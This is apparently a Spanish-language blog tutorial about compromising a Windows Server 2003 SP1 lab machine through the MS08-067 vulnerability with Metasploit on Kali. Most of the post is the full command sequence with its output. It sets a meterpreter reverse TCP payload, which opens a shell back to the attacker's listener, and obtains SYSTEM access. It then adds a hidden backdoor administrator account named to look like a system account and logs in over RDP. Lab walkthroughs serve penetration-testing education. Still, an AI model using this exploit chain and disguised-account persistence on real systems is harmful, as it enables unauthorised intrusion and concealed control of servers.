Home Security HACKING W2003 sp1 (MS08-67) con METASPLOIT en KALI 2017

HACKING W2003 sp1 (MS08-67) con METASPLOIT en KALI 2017

by José Luis Sánchez Borque

Vamos a utilizar la conocida vulnerabilidad NetApi MS08-67 sobre sistemas Microsoft para acceder a un servidor Windows 2003 sp1. Una vez conectados el objetivo es crear un usuario con privilegios de administrador.

Podemos encontrar toda la información sobre dicha vulnerabilidad en el siguiente enlace:

https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

MS08-067 – Critical

Vulnerability in Server Service Could Allow Remote Code Execution (958644)

Published: October 23, 2008

Version: 1.0

General Information

Executive Summary

This security update resolves a privately reported vulnerability in the Server service. The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit. Firewall best practices and standard default firewall configurations can help protect network resources from attacks that originate outside the enterprise perimeter.

This security update is rated Critical for all supported editions of Microsoft Windows 2000, Windows XP, Windows Server 2003, and rated Important for all supported editions of Windows Vista and Windows Server 2008. For more information, see the subsection, Affected and Non-Affected Software, in this section.

The security update addresses the vulnerability by correcting the way that the Server service handles RPC requests. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.

Empecemos con el proceso….

La máquina Windows 2003 sp1 tiene la IP 192.168.50.52, y la máquina Kali 192.168.50.51

Arrancaremos en primer lugar la base de datos con el comando:

root@kali:~# /etc/init.d/postgresql start

root@kali:~# /etc/init.d/postgresql status

● postgresql.service - PostgreSQL RDBMS
Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled)
Active: active (exited) since Sat 2017-08-26 08:38:37 CEST; 13min ago
Process: 1740 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
Main PID: 1740 (code=exited, status=0/SUCCESS)
Tasks: 0 (limit: 19660)
CGroup: /system.slice/postgresql.service
ago 26 08:38:37 kali systemd[1]: Starting PostgreSQL RDBMS...
ago 26 08:38:37 kali systemd[1]: Started PostgreSQL RDBMS.

Una vez arrancado, arrancamos el entorno de trabajo de METASPLOIT

root@kali:~# msfconsole

IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'

I love shells --egypt

=[ metasploit v4.15.7-dev ]

+ -- --=[ 1673 exploits - 960 auxiliary - 295 post ]
+ -- --=[ 489 payloads - 40 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

Veamos si tenemos el exploit dentro del entorno del entorno:

msf > search ms08_067

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption

Pasemos a utilizar el exploit (use), configurar el ordenador víctima (set RHOST) y verificar que es vulnerable a dicho exploit (check)

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description
---- --------------- -------- -----------

RHOST yes The target address

RPORT 445 yes The SMB service port (TCP)

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Exploit target:

Id Name
-- ----

0 Automatic Targeting

msf exploit(ms08_067_netapi) > set RHOST 192.168.50.52

RHOST => 192.168.50.52

msf exploit(ms08_067_netapi) > check

[+] 192.168.50.52:445 The target is vulnerable.

Podríamos ver con show payloads, todos los payload compatibles. Buscamos un meterpreter en nuestro caso windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description
---- --------------- -------- -----------

RHOST 192.168.50.52 yes The target address

RPORT 445 yes The SMB service port (TCP)

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----

0 Automatic Targeting

msf exploit(ms08_067_netapi) > set LHOST 192.168.50.51

LHOST => 192.168.50.51

msf exploit(ms08_067_netapi) >

Y ahora pasemos a la acción…….

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.50.51:4444
[*] 192.168.50.52:445 - Automatically detecting the target...
[*] 192.168.50.52:445 - Fingerprint: Windows 2003 - Service Pack 1 - lang:Unknown
[*] 192.168.50.52:445 - We could not detect the language pack, defaulting to English
[*] 192.168.50.52:445 - Selected Target: Windows 2003 SP1 English (NX)
[*] 192.168.50.52:445 - Attempting to trigger the vulnerability...
[*] Sending stage (956991 bytes) to 192.168.50.52
[*] Meterpreter session 1 opened (192.168.50.51:4444 -> 192.168.50.52:1305) at 2017-08-26 09:22:49 +0200

meterpreter >

Con el comando help podríamos ver todos los comandos disponibles de meterpreter. Ponemos una pequeña muestra de toda la info que sale por pantalla. En nuestro caso accedemos a la Shell con el comando correspondiente, y verificamos bajo que permisos:

meterpreter > shell

Process 3368 created.

Channel 1 created.

Microsoft Windows [Versin 5.2.3790]

(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami

whoami

nt authority\system

Ahora realizaremos los siguientes pasos con conocimientos del sistema:

  1. Crear un nuevo usuario con un nombre que parezca del sistema, nada de PACO, PEPE, HACKER..
  2. Lo añadiremos al grupo de administradores local
C:\WINDOWS\system32>net users

net users

Cuentas de usuario de \\
------------------------------------------------------------------------------

Administrador Invitado IUSR_MEGATRON-IN9JJC

krbtgt SUPPORT_388945a0

El comando se ha ejecutado con uno o ms errores.

C:\WINDOWS\system32>net user SUPPORT_112233 12345aA /add

net user SUPPORT_112233 12345aA /add

Se ha completado el comando correctamente.

C:\WINDOWS\system32>net localgroup administradores SUPPORT_112233 /ADD

net localgroup administradores SUPPORT_112233 /ADD

Se ha completado el comando correctamente.

C:\WINDOWS\system32>net localgroup administradores

net localgroup administradores

Nombre de alias administradores

Comentario Los administradores tienen acceso completo y sin restricciones al equipo o dominio

Miembros
-------------------------------------------------------------------------------

Administrador
Administradores de organizaci�n
Admins. del dominio
SUPPORT_112233

Se ha completado el comando correctamente.
C:\WINDOWS\system32>

Ya tenemos al usuario SUPPORT_112233 en el grupo de administradores locales de la máquina.

Ahora ya podemos acceder de forma tradicional, es decir con conocimientos del sistema opertivo y sin necesidad de METASPLOIT. Ya tenemos una cuenta de usuario válida: SUPPORT_112233

root@kali:~# rdesktop 192.168.50.52

Podríamos también desde el propio explorador de carpetas de Kali para el acceso a recursos compartidos: smb://192.168.50.52

 

Semana que viene a por un Windows 7 con escalada de privilegios.. NO faltéis.

You may also like

Leave a Comment